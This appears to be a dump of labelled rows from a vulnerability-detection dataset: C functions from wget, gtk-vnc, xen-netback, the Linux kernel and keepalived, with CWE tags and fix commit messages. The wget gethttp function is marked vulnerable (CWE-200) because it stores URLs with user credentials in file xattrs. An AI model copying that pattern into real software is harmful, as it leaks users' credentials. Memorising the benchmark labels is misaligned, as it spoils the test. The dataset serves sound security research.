write_error = body_file_send (sock, opt.body_file, body_data_size, warc_tmp);
}
}
if (write_error < 0)
{
CLOSE_INVALIDATE (sock);
if (warc_tmp != NULL)
fclose (warc_tmp);
if (write_error == -2)
retval = WARC_TMP_FWRITEERR;
else
retval = WRITEFAILED;
goto cleanup;
}
logprintf (LOG_VERBOSE, _("%s request sent, awaiting response... "),
proxy ? "Proxy" : "HTTP");
contlen = -1;
contrange = 0;
*dt &= ~RETROKF;
if (warc_enabled)
{
bool warc_result;
/* Generate a timestamp and uuid for this request. */
warc_timestamp (warc_timestamp_str, sizeof (warc_timestamp_str));
warc_uuid_str (warc_request_uuid);
/* Create a request record and store it in the WARC file. */
warc_result = warc_write_request_record (u->url, warc_timestamp_str,
warc_request_uuid, warc_ip,
warc_tmp, warc_payload_offset);
if (! warc_result)
{
CLOSE_INVALIDATE (sock);
retval = WARC_ERR;
goto cleanup;
}
/* warc_write_request_record has also closed warc_tmp. */
}
/* Repeat while we receive a 10x response code. */
{
bool _repeat;
do
{
head = read_http_response_head (sock);
if (!head)
{
if (errno == 0)
{
logputs (LOG_NOTQUIET, _("No data received.\n"));
CLOSE_INVALIDATE (sock);
retval = HEOF;
}
else
{
logprintf (LOG_NOTQUIET, _("Read error (%s) in headers.\n"),
fd_errstr (sock));
CLOSE_INVALIDATE (sock);
retval = HERR;
}
goto cleanup;
}
DEBUGP (("\n---response begin---\n%s---response end---\n", head));
resp = resp_new (head);
/* Check for status line. */
xfree (message);
statcode = resp_status (resp, &message);
if (statcode < 0)
{
char *tms = datetime_str (time (NULL));
logprintf (LOG_VERBOSE, "%d\n", statcode);
logprintf (LOG_NOTQUIET, _("%s ERROR %d: %s.\n"), tms, statcode,
quotearg_style (escape_quoting_style,
_("Malformed status line")));
CLOSE_INVALIDATE (sock);
retval = HERR;
goto cleanup;
}
if (H_10X (statcode))
{
xfree (head);
resp_free (&resp);
_repeat = true;
DEBUGP (("Ignoring response\n"));
}
else
{
_repeat = false;
}
}
while (_repeat);
}
xfree (hs->message);
hs->message = xstrdup (message);
if (!opt.server_response)
logprintf (LOG_VERBOSE, "%2d %s\n", statcode,
message ? quotearg_style (escape_quoting_style, message) : "");
else
{
logprintf (LOG_VERBOSE, "\n");
print_server_response (resp, " ");
}
if (!opt.ignore_length
&& resp_header_copy (resp, "Content-Length", hdrval, sizeof (hdrval)))
{
wgint parsed;
errno = 0;
parsed = str_to_wgint (hdrval, NULL, 10);
if (parsed == WGINT_MAX && errno == ERANGE)
{
/* Out of range.
#### If Content-Length is out of range, it most likely
means that the file is larger than 2G and that we're
compiled without LFS. In that case we should probably
refuse to even attempt to download the file. */
contlen = -1;
}
else if (parsed < 0)
{
/* Negative Content-Length; nonsensical, so we can't
assume any information about the content to receive. */
contlen = -1;
}
else
contlen = parsed;
}
/* Check for keep-alive related responses. */
if (!inhibit_keep_alive)
{
if (resp_header_copy (resp, "Connection", hdrval, sizeof (hdrval)))
{
if (0 == c_strcasecmp (hdrval, "Close"))
keep_alive = false;
}
}
chunked_transfer_encoding = false;
if (resp_header_copy (resp, "Transfer-Encoding", hdrval, sizeof (hdrval))
&& 0 == c_strcasecmp (hdrval, "chunked"))
chunked_transfer_encoding = true;
/* Handle (possibly multiple instances of) the Set-Cookie header. */
if (opt.cookies)
{
int scpos;
const char *scbeg, *scend;
/* The jar should have been created by now. */
assert (wget_cookie_jar != NULL);
for (scpos = 0;
(scpos = resp_header_locate (resp, "Set-Cookie", scpos,
&scbeg, &scend)) != -1;
++scpos)
{
char *set_cookie; BOUNDED_TO_ALLOCA (scbeg, scend, set_cookie);
cookie_handle_set_cookie (wget_cookie_jar, u->host, u->port,
u->path, set_cookie);
}
}
if (keep_alive)
/* The server has promised that it will not close the connection
when we're done. This means that we can register it. */
register_persistent (conn->host, conn->port, sock, using_ssl);
#ifdef HAVE_METALINK
/* We need to check for the Metalink data in the very first response
we get from the server (before redirections, authorization, etc.). */
if (metalink)
{
hs->metalink = metalink_from_http (resp, hs, u);
/* Bugfix: hs->local_file is NULL (opt.content_disposition). */
if (!hs->local_file && hs->metalink && hs->metalink->origin)
hs->local_file = xstrdup (hs->metalink->origin);
xfree (hs->message);
retval = RETR_WITH_METALINK;
CLOSE_FINISH (sock);
goto cleanup;
}
#endif
if (statcode == HTTP_STATUS_UNAUTHORIZED)
{
/* Authorization is required. */
uerr_t auth_err = RETROK;
bool retry;
/* Normally we are not interested in the response body.
But if we are writing a WARC file we are: we like to keep everything. */
if (warc_enabled)
{
int _err;
type = resp_header_strdup (resp, "Content-Type");
_err = read_response_body (hs, sock, NULL, contlen, 0,
chunked_transfer_encoding,
u->url, warc_timestamp_str,
warc_request_uuid, warc_ip, type,
statcode, head);
xfree (type);
if (_err != RETRFINISHED || hs->res < 0)
{
CLOSE_INVALIDATE (sock);
retval = _err;
goto cleanup;
}
else
CLOSE_FINISH (sock);
}
else
{
/* Since WARC is disabled, we are not interested in the response body. */
if (keep_alive && !head_only
&& skip_short_body (sock, contlen, chunked_transfer_encoding))
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
}
pconn.authorized = false;
{
auth_err = check_auth (u, user, passwd, resp, req,
&ntlm_seen, &retry,
&basic_auth_finished,
&auth_finished);
if (auth_err == RETROK && retry)
{
xfree (hs->message);
resp_free (&resp);
xfree (message);
xfree (head);
goto retry_with_auth;
}
}
if (auth_err == RETROK)
retval = AUTHFAILED;
else
retval = auth_err;
goto cleanup;
}
else /* statcode != HTTP_STATUS_UNAUTHORIZED */
{
/* Kludge: if NTLM is used, mark the TCP connection as authorized. */
if (ntlm_seen)
pconn.authorized = true;
}
{
uerr_t ret = check_file_output (u, hs, resp, hdrval, sizeof hdrval);
if (ret != RETROK)
{
retval = ret;
goto cleanup;
}
}
hs->statcode = statcode;
if (statcode == -1)
hs->error = xstrdup (_("Malformed status line"));
else if (!*message)
hs->error = xstrdup (_("(no description)"));
else
hs->error = xstrdup (message);
#ifdef HAVE_HSTS
if (opt.hsts && hsts_store)
{
hsts_params = resp_header_strdup (resp, "Strict-Transport-Security");
if (parse_strict_transport_security (hsts_params, &max_age, &include_subdomains))
{
/* process strict transport security */
if (hsts_store_entry (hsts_store, u->scheme, u->host, u->port, max_age, include_subdomains))
DEBUGP(("Added new HSTS host: %s:%u (max-age: %lu, includeSubdomains: %s)\n",
u->host,
(unsigned) u->port,
(unsigned long) max_age,
(include_subdomains ? "true" : "false")));
else
DEBUGP(("Updated HSTS host: %s:%u (max-age: %lu, includeSubdomains: %s)\n",
u->host,
(unsigned) u->port,
(unsigned long) max_age,
(include_subdomains ? "true" : "false")));
}
}
#endif
type = resp_header_strdup (resp, "Content-Type");
if (type)
{
char *tmp = strchr (type, ';');
if (tmp)
{
#ifdef ENABLE_IRI
/* sXXXav: only needed if IRI support is enabled */
char *tmp2 = tmp + 1;
#endif
while (tmp > type && c_isspace (tmp[-1]))
--tmp;
*tmp = '\0';
#ifdef ENABLE_IRI
/* Try to get remote encoding if needed */
if (opt.enable_iri && !opt.encoding_remote)
{
tmp = parse_charset (tmp2);
if (tmp)
set_content_encoding (iri, tmp);
xfree (tmp);
}
#endif
}
}
hs->newloc = resp_header_strdup (resp, "Location");
hs->remote_time = resp_header_strdup (resp, "Last-Modified");
if (!hs->remote_time) // now look for the Wayback Machine's timestamp
hs->remote_time = resp_header_strdup (resp, "X-Archive-Orig-last-modified");
if (resp_header_copy (resp, "Content-Range", hdrval, sizeof (hdrval)))
{
wgint first_byte_pos, last_byte_pos, entity_length;
if (parse_content_range (hdrval, &first_byte_pos, &last_byte_pos,
&entity_length))
{
contrange = first_byte_pos;
contlen = last_byte_pos - first_byte_pos + 1;
}
}
if (resp_header_copy (resp, "Content-Encoding", hdrval, sizeof (hdrval)))
{
hs->local_encoding = ENC_INVALID;
switch (hdrval[0])
{
case 'b': case 'B':
if (0 == c_strcasecmp(hdrval, "br"))
hs->local_encoding = ENC_BROTLI;
break;
case 'c': case 'C':
if (0 == c_strcasecmp(hdrval, "compress"))
hs->local_encoding = ENC_COMPRESS;
break;
case 'd': case 'D':
if (0 == c_strcasecmp(hdrval, "deflate"))
hs->local_encoding = ENC_DEFLATE;
break;
case 'g': case 'G':
if (0 == c_strcasecmp(hdrval, "gzip"))
hs->local_encoding = ENC_GZIP;
break;
case 'i': case 'I':
if (0 == c_strcasecmp(hdrval, "identity"))
hs->local_encoding = ENC_NONE;
break;
case 'x': case 'X':
if (0 == c_strcasecmp(hdrval, "x-compress"))
hs->local_encoding = ENC_COMPRESS;
else if (0 == c_strcasecmp(hdrval, "x-gzip"))
hs->local_encoding = ENC_GZIP;
break;
case '\0':
hs->local_encoding = ENC_NONE;
}
if (hs->local_encoding == ENC_INVALID)
{
DEBUGP (("Unrecognized Content-Encoding: %s\n", hdrval));
hs->local_encoding = ENC_NONE;
}
#ifdef HAVE_LIBZ
else if (hs->local_encoding == ENC_GZIP
&& opt.compression != compression_none)
{
const char *p;
/* Make sure the Content-Type is not gzip before decompressing */
if (type)
{
p = strchr (type, '/');
if (p == NULL)
{
hs->remote_encoding = ENC_GZIP;
hs->local_encoding = ENC_NONE;
}
else
{
p++;
if (c_tolower(p[0]) == 'x' && p[1] == '-')
p += 2;
if (0 != c_strcasecmp (p, "gzip"))
{
hs->remote_encoding = ENC_GZIP;
hs->local_encoding = ENC_NONE;
}
}
}
else
{
hs->remote_encoding = ENC_GZIP;
hs->local_encoding = ENC_NONE;
}
/* don't uncompress if a file ends with '.gz' or '.tgz' */
if (hs->remote_encoding == ENC_GZIP
&& (p = strrchr(u->file, '.'))
&& (c_strcasecmp(p, ".gz") == 0 || c_strcasecmp(p, ".tgz") == 0))
{
DEBUGP (("Enabling broken server workaround. Will not decompress this GZip file.\n"));
hs->remote_encoding = ENC_NONE;
}
}
#endif
}
/* 20x responses are counted among successful by default. */
if (H_20X (statcode))
*dt |= RETROKF;
if (statcode == HTTP_STATUS_NO_CONTENT)
{
/* 204 response has no body (RFC 2616, 4.3) */
/* In case the caller cares to look... */
hs->len = 0;
hs->res = 0;
hs->restval = 0;
CLOSE_FINISH (sock);
retval = RETRFINISHED;
goto cleanup;
}
/* Return if redirected. */
if (H_REDIRECTED (statcode) || statcode == HTTP_STATUS_MULTIPLE_CHOICES)
{
/* RFC2068 says that in case of the 300 (multiple choices)
response, the server can output a preferred URL through
`Location' header; otherwise, the request should be treated
like GET. So, if the location is set, it will be a
redirection; otherwise, just proceed normally. */
if (statcode == HTTP_STATUS_MULTIPLE_CHOICES && !hs->newloc)
*dt |= RETROKF;
else
{
logprintf (LOG_VERBOSE,
_("Location: %s%s\n"),
hs->newloc ? escnonprint_uri (hs->newloc) : _("unspecified"),
hs->newloc ? _(" [following]") : "");
/* In case the caller cares to look... */
hs->len = 0;
hs->res = 0;
hs->restval = 0;
/* Normally we are not interested in the response body of a redirect.
But if we are writing a WARC file we are: we like to keep everything. */
if (warc_enabled)
{
int _err = read_response_body (hs, sock, NULL, contlen, 0,
chunked_transfer_encoding,
u->url, warc_timestamp_str,
warc_request_uuid, warc_ip, type,
statcode, head);
if (_err != RETRFINISHED || hs->res < 0)
{
CLOSE_INVALIDATE (sock);
retval = _err;
goto cleanup;
}
else
CLOSE_FINISH (sock);
}
else
{
/* Since WARC is disabled, we are not interested in the response body. */
if (keep_alive && !head_only
&& skip_short_body (sock, contlen, chunked_transfer_encoding))
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
}
/* From RFC2616: The status codes 303 and 307 have
been added for servers that wish to make unambiguously
clear which kind of reaction is expected of the client.
A 307 should be redirected using the same method,
in other words, a POST should be preserved and not
converted to a GET in that case.
With strict adherence to RFC2616, POST requests are not
converted to a GET request on 301 Permanent Redirect
or 302 Temporary Redirect.
A switch may be provided later based on the HTTPbis draft
that allows clients to convert POST requests to GET
requests on 301 and 302 response codes. */
switch (statcode)
{
case HTTP_STATUS_TEMPORARY_REDIRECT:
case HTTP_STATUS_PERMANENT_REDIRECT:
retval = NEWLOCATION_KEEP_POST;
goto cleanup;
case HTTP_STATUS_MOVED_PERMANENTLY:
if (opt.method && c_strcasecmp (opt.method, "post") != 0)
{
retval = NEWLOCATION_KEEP_POST;
goto cleanup;
}
break;
case HTTP_STATUS_MOVED_TEMPORARILY:
if (opt.method && c_strcasecmp (opt.method, "post") != 0)
{
retval = NEWLOCATION_KEEP_POST;
goto cleanup;
}
break;
}
retval = NEWLOCATION;
goto cleanup;
}
}
if (cond_get)
{
if (statcode == HTTP_STATUS_NOT_MODIFIED)
{
logprintf (LOG_VERBOSE,
_ ("File %s not modified on server. Omitting download.\n\n"),
quote (hs->local_file));
*dt |= RETROKF;
CLOSE_FINISH (sock);
retval = RETRUNNEEDED;
goto cleanup;
}
}
set_content_type (dt, type);
if (opt.adjust_extension)
{
const char *encoding_ext = NULL;
switch (hs->local_encoding)
{
case ENC_INVALID:
case ENC_NONE:
break;
case ENC_BROTLI:
encoding_ext = ".br";
break;
case ENC_COMPRESS:
encoding_ext = ".Z";
break;
case ENC_DEFLATE:
encoding_ext = ".zlib";
break;
case ENC_GZIP:
encoding_ext = ".gz";
break;
default:
DEBUGP (("No extension found for encoding %d\n",
hs->local_encoding));
}
if (encoding_ext != NULL)
{
char *file_ext = strrchr (hs->local_file, '.');
/* strip Content-Encoding extension (it will be re-added later) */
if (file_ext != NULL && 0 == strcasecmp (file_ext, encoding_ext))
*file_ext = '\0';
}
if (*dt & TEXTHTML)
/* -E / --adjust-extension / adjust_extension = on was specified,
and this is a text/html file. If some case-insensitive
variation on ".htm[l]" isn't already the file's suffix,
tack on ".html". */
{
ensure_extension (hs, ".html", dt);
}
else if (*dt & TEXTCSS)
{
ensure_extension (hs, ".css", dt);
}
if (encoding_ext != NULL)
{
ensure_extension (hs, encoding_ext, dt);
}
}
if (cond_get)
{
/* Handle the case when server ignores If-Modified-Since header. */
if (statcode == HTTP_STATUS_OK && hs->remote_time)
{
time_t tmr = http_atotm (hs->remote_time);
/* Check if the local file is up-to-date based on Last-Modified header
and content length. */
if (tmr != (time_t) - 1 && tmr <= hs->orig_file_tstamp
&& (contlen == -1 || contlen == hs->orig_file_size))
{
logprintf (LOG_VERBOSE,
_("Server ignored If-Modified-Since header for file %s.\n"
"You might want to add --no-if-modified-since option."
"\n\n"),
quote (hs->local_file));
*dt |= RETROKF;
CLOSE_INVALIDATE (sock);
retval = RETRUNNEEDED;
goto cleanup;
}
}
}
if (statcode == HTTP_STATUS_RANGE_NOT_SATISFIABLE
|| (!opt.timestamping && hs->restval > 0 && statcode == HTTP_STATUS_OK
&& contrange == 0 && contlen >= 0 && hs->restval >= contlen))
{
/* If `-c' is in use and the file has been fully downloaded (or
the remote file has shrunk), Wget effectively requests bytes
after the end of file and the server response with 416
(or 200 with a <= Content-Length. */
logputs (LOG_VERBOSE, _("\
\n The file is already fully retrieved; nothing to do.\n\n"));
/* In case the caller inspects. */
hs->len = contlen;
hs->res = 0;
/* Mark as successfully retrieved. */
*dt |= RETROKF;
/* Try to maintain the keep-alive connection. It is often cheaper to
* consume some bytes which have already been sent than to negotiate
* a new connection. However, if the body is too large, or we don't
* care about keep-alive, then simply terminate the connection */
if (keep_alive &&
skip_short_body (sock, contlen, chunked_transfer_encoding))
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
retval = RETRUNNEEDED;
goto cleanup;
}
if ((contrange != 0 && contrange != hs->restval)
|| (H_PARTIAL (statcode) && !contrange && hs->restval))
{
/* The Range request was somehow misunderstood by the server.
Bail out. */
CLOSE_INVALIDATE (sock);
retval = RANGEERR;
goto cleanup;
}
if (contlen == -1)
hs->contlen = -1;
/* If the response is gzipped, the uncompressed size is unknown. */
else if (hs->remote_encoding == ENC_GZIP)
hs->contlen = -1;
else
hs->contlen = contlen + contrange;
if (opt.verbose)
{
if (*dt & RETROKF)
{
/* No need to print this output if the body won't be
downloaded at all, or if the original server response is
printed. */
logputs (LOG_VERBOSE, _("Length: "));
if (contlen != -1)
{
logputs (LOG_VERBOSE, number_to_static_string (contlen + contrange));
if (contlen + contrange >= 1024)
logprintf (LOG_VERBOSE, " (%s)",
human_readable (contlen + contrange, 10, 1));
if (contrange)
{
if (contlen >= 1024)
logprintf (LOG_VERBOSE, _(", %s (%s) remaining"),
number_to_static_string (contlen),
human_readable (contlen, 10, 1));
else
logprintf (LOG_VERBOSE, _(", %s remaining"),
number_to_static_string (contlen));
}
}
else
logputs (LOG_VERBOSE,
opt.ignore_length ? _("ignored") : _("unspecified"));
if (type)
logprintf (LOG_VERBOSE, " [%s]\n", quotearg_style (escape_quoting_style, type));
else
logputs (LOG_VERBOSE, "\n");
}
}
/* Return if we have no intention of further downloading. */
if ((!(*dt & RETROKF) && !opt.content_on_error) || head_only || (opt.spider && !opt.recursive))
{
/* In case the caller cares to look... */
hs->len = 0;
hs->res = 0;
hs->restval = 0;
/* Normally we are not interested in the response body of a error responses.
But if we are writing a WARC file we are: we like to keep everything. */
if (warc_enabled)
{
int _err = read_response_body (hs, sock, NULL, contlen, 0,
chunked_transfer_encoding,
u->url, warc_timestamp_str,
warc_request_uuid, warc_ip, type,
statcode, head);
if (_err != RETRFINISHED || hs->res < 0)
{
CLOSE_INVALIDATE (sock);
retval = _err;
goto cleanup;
}
CLOSE_FINISH (sock);
}
else
{
/* Since WARC is disabled, we are not interested in the response body. */
if (head_only)
/* Pre-1.10 Wget used CLOSE_INVALIDATE here. Now we trust the
servers not to send body in response to a HEAD request, and
those that do will likely be caught by test_socket_open.
If not, they can be worked around using
`--no-http-keep-alive'. */
CLOSE_FINISH (sock);
else if (opt.spider && !opt.recursive)
/* we just want to see if the page exists - no downloading required */
CLOSE_INVALIDATE (sock);
else if (keep_alive
&& skip_short_body (sock, contlen, chunked_transfer_encoding))
/* Successfully skipped the body; also keep using the socket. */
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
}
if (statcode == HTTP_STATUS_GATEWAY_TIMEOUT)
retval = GATEWAYTIMEOUT;
else
retval = RETRFINISHED;
goto cleanup;
}
err = open_output_stream (hs, count, &fp);
if (err != RETROK)
{
CLOSE_INVALIDATE (sock);
retval = err;
goto cleanup;
}
#ifdef ENABLE_XATTR
if (opt.enable_xattr)
{
if (original_url != u)
set_file_metadata (u->url, original_url->url, fp);
else
set_file_metadata (u->url, NULL, fp);
}
#endif
err = read_response_body (hs, sock, fp, contlen, contrange,
chunked_transfer_encoding,
u->url, warc_timestamp_str,
warc_request_uuid, warc_ip, type,
statcode, head);
if (hs->res >= 0)
CLOSE_FINISH (sock);
else
CLOSE_INVALIDATE (sock);
if (!output_stream)
fclose (fp);
retval = err;
cleanup:
xfree (head);
xfree (type);
xfree (message);
resp_free (&resp);
request_free (&req);
return retval;
}
| 1 |
[
"CWE-200"
] |
wget
|
3cdfb594cf75f11cdbb9702ac5e856c332ccacfa
| 282,839,609,107,155,530,000,000,000,000,000,000,000 | 1,026 |
Don't save user/pw with --xattr
Also the Referer info is reduced to scheme+host+port.
* src/ftp.c (getftp): Change params of set_file_metadata()
* src/http.c (gethttp): Change params of set_file_metadata()
* src/xattr.c (set_file_metadata): Remove user/password from origin URL,
reduce Referer value to scheme/host/port.
* src/xattr.h: Change prototype of set_file_metadata()
|
static void test_validation_unexpected_cmap(void)
{
test_validation(test_unexpected_cmap_server);
}
| 0 |
[] |
gtk-vnc
|
c8583fd3783c5b811590fcb7bae4ce6e7344963e
| 103,916,375,801,096,200,000,000,000,000,000,000,000 | 4 |
Correctly validate color map range indexes
The color map index could wrap around to zero causing negative
array index accesses.
https://bugzilla.gnome.org/show_bug.cgi?id=778050
CVE-2017-5885
Signed-off-by: Daniel P. Berrange <[email protected]>
|
static irqreturn_t xenvif_rx_interrupt(int irq, void *dev_id)
{
struct xenvif *vif = dev_id;
xenvif_kick_thread(vif);
return IRQ_HANDLED;
}
| 0 |
[
"CWE-399"
] |
net-next
|
e9d8b2c2968499c1f96563e6522c56958d5a1d0d
| 217,717,788,620,721,070,000,000,000,000,000,000,000 | 8 |
xen-netback: disable rogue vif in kthread context
When netback discovers frontend is sending malformed packet it will
disables the interface which serves that frontend.
However disabling a network interface involving taking a mutex which
cannot be done in softirq context, so we need to defer this process to
kthread context.
This patch does the following:
1. introduce a flag to indicate the interface is disabled.
2. check that flag in TX path, don't do any work if it's true.
3. check that flag in RX path, turn off that interface if it's true.
The reason to disable it in RX path is because RX uses kthread. After
this change the behavior of netback is still consistent -- it won't do
any TX work for a rogue frontend, and the interface will be eventually
turned off.
Also change a "continue" to "break" after xenvif_fatal_tx_err, as it
doesn't make sense to continue processing packets if frontend is rogue.
This is a fix for XSA-90.
Reported-by: Török Edwin <[email protected]>
Signed-off-by: Wei Liu <[email protected]>
Cc: Ian Campbell <[email protected]>
Reviewed-by: David Vrabel <[email protected]>
Acked-by: Ian Campbell <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
static int rm_from_queue_full(sigset_t *mask, struct sigpending *s)
{
struct sigqueue *q, *n;
sigset_t m;
sigandsets(&m, mask, &s->signal);
if (sigisemptyset(&m))
return 0;
sigandnsets(&s->signal, &s->signal, mask);
list_for_each_entry_safe(q, n, &s->list, list) {
if (sigismember(mask, q->info.si_signo)) {
list_del_init(&q->list);
__sigqueue_free(q);
}
}
return 1;
}
| 0 |
[
"CWE-400"
] |
linux-stable-rt
|
bcf6b1d78c0bde228929c388978ed3af9a623463
| 290,268,833,502,203,300,000,000,000,000,000,000,000 | 18 |
signal/x86: Delay calling signals in atomic
On x86_64 we must disable preemption before we enable interrupts
for stack faults, int3 and debugging, because the current task is using
a per CPU debug stack defined by the IST. If we schedule out, another task
can come in and use the same stack and cause the stack to be corrupted
and crash the kernel on return.
When CONFIG_PREEMPT_RT_FULL is enabled, spin_locks become mutexes, and
one of these is the spin lock used in signal handling.
Some of the debug code (int3) causes do_trap() to send a signal.
This function calls a spin lock that has been converted to a mutex
and has the possibility to sleep. If this happens, the above issues with
the corrupted stack is possible.
Instead of calling the signal right away, for PREEMPT_RT and x86_64,
the signal information is stored on the stacks task_struct and
TIF_NOTIFY_RESUME is set. Then on exit of the trap, the signal resume
code will send the signal when preemption is enabled.
[ rostedt: Switched from #ifdef CONFIG_PREEMPT_RT_FULL to
ARCH_RT_DELAYS_SIGNAL_SEND and added comments to the code. ]
Cc: [email protected]
Signed-off-by: Oleg Nesterov <[email protected]>
Signed-off-by: Steven Rostedt <[email protected]>
Signed-off-by: Thomas Gleixner <[email protected]>
|
vrrp_check_adv_addr_handler(__attribute__((unused)) vector_t *strvec)
{
global_data->vrrp_skip_check_adv_addr = 1;
}
| 0 |
[
"CWE-200"
] |
keepalived
|
c6247a9ef2c7b33244ab1d3aa5d629ec49f0a067
| 300,749,264,210,411,200,000,000,000,000,000,000,000 | 4 |
Add command line and configuration option to set umask
Issue #1048 identified that files created by keepalived are created
with mode 0666. This commit changes the default to 0644, and also
allows the umask to be specified in the configuration or as a command
line option.
Signed-off-by: Quentin Armitage <[email protected]>
|
Subsets and Splits
CWE 416 & 19
The query filters records related to specific CWEs (Common Weakness Enumerations), providing a basic overview of entries with these vulnerabilities but without deeper analysis.
CWE Frequency in Train Set
Counts the occurrences of each CWE (Common Weakness Enumeration) in the dataset, providing a basic distribution but limited insight.